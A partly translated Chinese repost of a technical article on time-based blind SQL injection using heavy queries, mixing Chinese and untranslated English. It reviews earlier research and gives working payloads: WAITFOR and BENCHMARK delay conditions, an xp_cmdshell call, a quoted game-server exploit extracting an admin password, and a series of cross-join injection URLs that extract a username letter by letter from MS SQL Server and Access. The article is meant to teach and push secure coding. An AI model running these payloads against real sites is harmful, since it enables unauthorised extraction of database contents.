基于时间的大量查询下盲SQL注入技术

时间:2021-05-02

本文翻译了一篇关于SQL注入技术的文章,由于对该技术了解的匮乏,翻译过于生硬。希望对能了解该技术的人有所帮助,由于原文较长,翻译周期可能较长,在这里仅给出一部分翻译内容,在今后的日子里将不断补充和完善。

原文地址:http:///technet/community/columns/secmvp/sv0907.mspx(Time-Based Blind SQL Injection with Heavy Queries)

简介

本文介绍了黑客使用大量查询,通过基于时间的(time-based)盲SQL注入法,如何利用漏洞进行SQL注入。本文的目标在于强调为WEB应用程序建立安全发展的最佳实践,而不是仅仅依赖于周边提供的防御措施。本文的开发案例以Microsoft SQL Server和Microsoft Access数据库为主,但是这项技术可以运用到当前市场中使用的任何数据库中。

Time-Based Blind SQL Injection

第一个论述 “blind attacks”技术的文献是 Chris Anley 在2002年6月份发表的论文: “【高级SQL注入技术】(More) Advanced SQL Injection” [1],在这个文献中,他给出了time-based的特殊案例,这些案例很不普通,他要求大家引起注意。下面是Chris给出的盲SQL注入技术的一些例子:

<<•••••• if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5' …it is possible to determine whether a given bit in a string is '1' or ’0’.That is, the above query will pause for five seconds if bit '@bit' of byte '@byte' in string '@s' is '1.'

例如,下面的查询,如果当前数据库的名字的第一个字节的第一位是1的话,将导致暂停5秒钟。: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'

这些例子表明,使用一个危险的参数可以将信息从数据库中提取出来。当条件为真时,代码将被注入生成一个给定时间的延迟。

在Chris之后,由于盲SQL注入技术与延迟数据库技术相比,具有简单性、快速执行性和显示错误信息的范围,继续从攻击系统中得到在生成错误消息方面的更多研究。一年后,即2003年9月,Ofer Maor和Amichai Shulman发表了题为 “Blindfolded SQL Injection” 的论文[2]。在这篇文章中,作者分析了在SQL注入系统中,识别危险参数的不同方式,这种攻击甚至是信息处理过程和返回值是不可见的。

At the 2004 BlackHat Conference, Cameron Hotchkies presented his paper “Blind SQL Injection Automation Techniques” [3]. He proposed alternative methods to automate the exploitation of a Blind SQL Injection vulnerable parameter, using different custom tools. He suggested three different solutions for the automation: (1) Searching for keywords on positive and negative results; (2) Using MD5 signatures to discriminate positive and negative results; (3) Using textual difference engine. He also introduced SQueal, an automatic tool to extract information through Blind SQL Injection, which evolved later to another tool called Absinthe [4].

In September 2005, David Litchfield published the article “Data Mining with SQL Injection and Inference” [5], where he discussed the time-based inference techniques, and proposed other ways to obtain time delays using calls to stored procedures, such as xp_cmdshell on MS SQL Server to do a ping.

xp_cmdshell ‘ping –n 10 127.0.0.1’ → application paused 10 seconds.

Time-based techniques can be extended to any action performed by a stored procedure and able to generate a time delay or any other measurable action.

In December 2006, Ronald van den Heetkamp published the “SQL Injection Cheat Sheet” [6], including Blind SQL Injection tricks for MySQL with some examples based on benchmark functions that can generate time delays. For instance:

SELECT BENCHMARK(10000000,ENCODE('abc','123')); [around 5 sec] SELECT BENCHMARK(1000000,MD5(CHAR(116))) [ around 7 sec] Example: SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

A recent exploit [7], published in June 2007 at http:// (a Web site dedicated to exploits and security) shows how this technique could be used to attack a game server called Solar Empire:

¡$sql="F***You'),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw, ".$j.", 1)) =".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*";

As the studies of the time-based Blind SQL Injection techniques are moving forward, some new tools have been created, such as SQL Ninja [8], which uses the Wait-for method for Microsoft SQL Server engines, or SQL PowerInjector[9], which implements the Wait-for method for Microsoft SQL Server Database engines, Benchmark functions for MySQL engines, and an extension of the Wait-for method for Oracle engines, using calls to DBMS_LOCK methods.

Time Delays

Taking into consideration the methods described above, we can see that having access to stored procedures for Microsoft SQL Server and Oracle is needed to be able to generate time delays using calls to Wait-for methods and DBMS_LOCK. However, this is not necessary on MySQL engines, because in this case a mathematic function is used to generate the time delay. Some Intrusion Detection Systems (IDS) and Firewalls applications have the ability to block the URLs that use Benchmark functions.

The question now is, if the use of stored procedures and Benchmark functions is cancelled, could we generate a time-based blind SQL injection method?

The answer is yes. Blind SQL injection exploits can only be avoided by using the right programming technique, or, in Michael Howard’s words, “All input is evil until proven otherwise.”

A simple way to generate time delays is to take advantage of one of the biggest database problems, that have made necessary the development of performance-tuning techniques; heavy queries. All you need to generate a time delay is to access a table that has some registers and to build a good query to force the engine to work. In other words, we need to build a query ignoring what the performance best practices recommend.

In this example we have a URL with a SQL Injection vulnerability that can be exploited only by a time-based blind SQL injection. This means that there isn’t any error message produced by the system, and we always obtain the same response (sometimes because a query is right and sometimes because the programmer has coded that value as a default).

Figure 1: Error condition. The programmer returns a default value -> Result 1

Example 1: Microsoft SQL Server. Exploitation with Heavy queries:

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

Figure 2: Positive result. The condition is true, and the response has a delay of 14 seconds.

As we can see in Figure 2, the query starts at 23:49:11 and ends at 23:49:25 -- 14 seconds. This delay is caused by the third condition in the “where” clause; if it is TRUE, then “300>(select top 1 ascii(substring(name,1,1)) from sysusers)” is TRUE. We actually know that the ASCII value of the first username’s letter in the sysusers table is lower than 300.

Figure 3: Negative Result. One-second response delay

As we can see in Figure 3, the query starts at 00:00:28 and ends at 00:00:29 -- one second. This delay is caused by the third condition in the “where” clause; if it is FALSE, then “0>(select top 1 ascii(substring(name,1,1)) from sysusers)” is FALSE. We actually know than the ASCII value of the first username’s letter in the sysusers table is higher than 0.

With these two queries we can access all the information stored in the database measuring the time. The main idea is that when the third condition in the query is FALSE, the database engine stops processing the second condition because with one FALSE value in a query with “and” operators, the result will be FALSE. Therefore, the database engine doesn’t have to process the heavy query (second condition). So, if we want to know the exact value of the username stored, we have to move the index and measure the response time:

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 0 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 75 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 100 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 110 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 120 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 115 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 118 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 119 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

Then the result is ASCII(119)=’ w ’

And then we start with the second letter:

http:///blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → ?

Example 2: Microsoft Access. Using the MSysAccessObjects table.

http:///retohacking/pista.aspx?id_pista=1 and (SELECT count(*) FROM MSysAccessObjects A 20T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10)>0 and exists (select * from contrasena)

Figure 4: Negative Result. One-second response delay.

Figure 5: Positive Result. Six-second response delay.

In this example you see a heavy query for Microsoft Access databases with a delay of six seconds. An attacker can extract all information using the same method shown in the Microsoft SQL Server example and using this heavy query as a second condition in the “where" clause to delay the response.

Conclusions

Taking into consideration the methods described above, we can see that having access to stored procedures for Microsoft SQL Server and Oracle is needed to be able to generate time delays using calls to Wait-for methods and DBMS_LOCK. However, this is not necessary on MySQL engines, because in this case a mathematic function is used to generate the time delay. Some Intrusion Detection Systems (IDS) and Firewall applications have the ability to block the URLs that use Benchmark functions.

Authors

The information presented here is extracted from the PhD thesis Chema Alonso (Microsoft Windows Security MVP, Systems Engineer, Rey Juan Carlos University) is currently working on under the direction of Dr. Antonio Guzmán (Systems Engineering Doctor, Rey Juan Carlos University) and Dr. Marta Beltran (Systems Engineering Doctor, Rey Juan Carlos University).

Mr. Daniel Kachakil (Systems Engineer and Master on Software Engineering, University Politécnica of Valencia) and Mr. Rodolfo Bordón (System Security Consultant and Software Specialist Technician) have also helped produce also contributed to this article by assisting with response time tests in different environments.

Bibliography

[1] “(more) Advanced SQL Injection” by Chris Anley, NGS SoftwareURL: http:///papers/more_advanced_sql_injection.pdf [2] “Blindfolded SQL Injection” by Ofer Maor and Amichai Shulman, ImpervaURL: http:///application_defense_center/white_papers/blind_sql_server_injection.html [3] “Blind SQL Injection Automation Techniques” by Cameron Hotchkies, BlackHat ConferencesURL: https:///presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf [4] “Absinthe” by Cameron Hotchkies, 0x90.URL: http:///research/papers/sqlinference.pdf [6] “SQL Injection Cheat Sheet” by Ronald van den Heetkamp, 0x000000URL: http:///?i=14&bin=1110 [7] “ Solar Empire Exploit” by Blackhawk. Milw0rm. URL: http:///exploits/4078 [8] “…a SQL Server Injection & takeover tool… ” by icesurfer, SQLNinja URL: http://sqlninja.sourceforge.net [9] “SQL PowerInjector” by Francois Larouche, SQL PowerInjectorURL: http://

本文源自:翔宇亭——IT乐园(http://),转载请保留此信息!

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章